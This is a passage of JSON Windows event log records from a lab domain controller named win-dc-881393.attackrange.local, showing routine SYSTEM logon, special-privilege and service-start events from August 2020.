","AuthenticationPackageName":"NTLM","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"NTLM V1","KeyLength":"0","ProcessName":"-","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1843","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220293,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220294,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220295,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220296,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76800,"ProcessID":856,"ThreadID":2552,"Channel":"System","Message":"The RemoteRegistry service entered the running state.","param1":"RemoteRegistry","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76801,"ProcessID":856,"ThreadID":932,"Channel":"System","Message":"The PcaSvc service entered the running state.","param1":"PcaSvc","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220297,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220298,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76802,"ProcessID":856,"ThreadID":2588,"Channel":"System","Message":"The AWSLiteAgent service entered the running state.","param1":"AWSLiteAgent","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76803,"ProcessID":856,"ThreadID":924,"Channel":"System","Message":"The IsmServ service entered the running state.","param1":"IsmServ","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76804,"ProcessID":856,"ThreadID":1212,"Channel":"System","Message":"The DFSR service entered the running state.","param1":"DFSR","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76805,"ProcessID":856,"ThreadID":924,"Channel":"System","Message":"The Dfs service entered the running state.","param1":"Dfs","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76806,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The WpnService service entered the running state.","param1":"WpnService","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76807,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The EFS service entered the running state.","param1":"EFS","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76808,"ProcessID":856,"ThreadID":2556,"Channel":"System","Message":"The WinRM service entered the running state.","param1":"WinRM","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220299,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220300,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76809,"ProcessID":856,"ThreadID":924,"Channel":"System","Message":"The sysmon64 service entered the running state.","param1":"sysmon64","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76810,"ProcessID":856,"ThreadID":924,"Channel":"System","Message":"The StateRepository service entered the running state.","param1":"StateRepository","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
